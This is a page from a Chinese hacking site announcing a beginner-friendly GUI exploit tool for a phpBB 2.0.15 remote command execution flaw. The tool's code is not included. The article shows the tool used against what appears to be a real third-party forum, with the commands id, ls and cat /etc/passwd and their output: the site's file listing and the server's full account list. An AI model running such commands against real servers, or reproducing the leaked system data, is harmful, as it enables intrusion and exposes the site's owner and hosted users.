我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 安全防御 | 程序设计 | 系统操作 | 网络技术 | 本站动态 | 业界动态 | 安全公告 | 病毒公告
 
 
您当前的位置:我爱黑客网 -> 黑客攻防 -> 工具详解 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈
热门文章
· 灰鸽子新手完全教程(..
· 关于一句话木马
· 帮老马的ASP站长助手正..
· google 搜索引擎实用技..
· 软件、程序脱壳的各种..
· 开启网络终端连接最简..
· Hacker defender 中文..
· 黑客必备命令-FTP命令..
· 最新版的pcshare的免疫..
· 用好MSN Spaces之新手..
· 视频:ADSL宽带共享上..
· 便捷的数据收集工具—..
相关文章

· PHP安全配置
· PHP中的代码安全和S..
· PHP木马攻击的防御之..
· myPHP论坛v.1.0中存..
· Darkne2s发现的phpm..
· vBulletin 3.0.x PH..
· phpBB Group phpBB2..
· phpWebSite 发表模块..
· phpBB 2.0.12非法获..
· phpBB 2.0.13 regis..
查看更多与PHPbb2.0.15远程命令执行漏洞利用程序GUI版相关内容

PHPbb2.0.15远程命令执行漏洞利用程序GUI版
作者:幽火  来源:www.5ihack.com  发布时间:2007-5-6 13:50:42  发布人:ghostfire

减小字体 增大字体


烦人的小学期终于上完了,看到无敌兄的<<PHPbb2.0.15远程命令执行漏洞测试改写小记>>,现在有空了,自己也写了一个此漏洞的利用程序的GUI版,适合菜鸟使用.程序基本实现了http://www.securiteam.com/exploits/5QP0X00G0C.html这个python程序的功能.注意:读取数据量过大时,程序会出现短暂的假死. 
测试: 
Forum Url: http://www.tuoitho.net/diendan/ ;
Topic ID: 15218 Command: id 
Data Received: uid=99(nobody) gid=99(nobody) groups=99(nobody) 

当然我们可以换用其他命令如输入ls返回: 

_makepagelink.php 
_new_register.txt 
_news.txt 
admin 
bank_index.php 
cache 
chat_popup.js 
common.php 
config.php 
db 
ecards 
extension.inc 
faq.php 
flashgame 
forum.php 
gallery 
groupcp.php 
images 
includes 
index.php 
language 
login.php 
memberlist.php 
modcp.php 
photo 
posting.php 
privmsg.php 
profile.php 
realmusic.php 
search.php 
streammedia.php 
templates 
tt_images 
tt_temp 
ttd_news.php 
vietuni8.js 
viewforum.php 
viewonline.php 
viewtopic.php 
ysi.htm 
ysi.php 

输入cat /etc/passwd返回: 

root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
news:x:9:13:news:/etc/news: 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin 
games:x:12:100:games:/usr/games:/sbin/nologin 
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin 
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 
rpm:x:37:37::/var/lib/rpm:/sbin/nologin 
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin 
ident:x:100:101::/home/ident:/sbin/nologin 
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash 
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin 
pcap:x:77:77::/var/arpwatch:/sbin/nologin 
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin 
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin 
named:x:25:25:Named:/var/named:/sbin/nologin 
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash 
mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false 
cpanel:x:32001:502::/usr/local/cpanel:/bin/bash 
mailman:x:32002:503::/usr/local/cpanel/3rdparty/mailman:/bin/bash 
ltsv-1990:x:32003:32003::/home/ltsv-1990:/bin/bash 
ttnet:x:32004:504::/home/ttnet:/bin/bash 
ttmail:x:32005:505::/home/ttmail:/usr/local/cpanel/bin/noshell 
doicongl:x:32006:506::/home/doicongl:/usr/local/cpanel/bin/noshell 
realmsof:x:32007:507::/home/realmsof:/usr/local/cpanel/bin/noshell 
trpanoco:x:32009:509::/home/trpanoco:/usr/local/cpanel/bin/noshell 
qua:x:32008:508::/home/qua:/usr/local/cpanel/bin/noshell 
key:x:32010:510::/home/key:/usr/local/cpanel/bin/noshell 
cuop:x:32011:511::/home/cuop:/usr/local/cpanel/bin/noshell 
bluewebp:x:32012:512::/home/bluewebp:/usr/local/cpanel/bin/noshell 
shugoten:x:32013:513::/home/shugoten:/usr/local/cpanel/bin/noshell 
afghansa:x:32014:514::/home/afghansa:/usr/local/cpanel/bin/noshell 
polishtr:x:32015:515::/home/polishtr:/usr/local/cpanel/bin/noshell 
gioitrec:x:32016:516::/home/gioitrec:/usr/local/cpanel/bin/noshell 
colorado:x:32017:517::/home/colorado:/usr/local/cpanel/bin/noshell 
wannabel:x:32018:518::/home/wannabel:/usr/local/cpanel/bin/noshell 
cactuslo:x:32019:519::/home/cactuslo:/usr/local/cpanel/bin/noshell 
aznphoto:x:32020:520::/home/aznphoto:/bin/bash 
journeyo:x:32021:521::/home/journeyo:/usr/local/cpanel/bin/noshell 
chiropra:x:32022:522::/home/chiropra:/usr/local/cpanel/bin/noshell

查看更多与PHPbb2.0.15远程命令执行漏洞利用程序GUI版相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      MT.EXE程序测试报告+下载       nessus安装指南
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图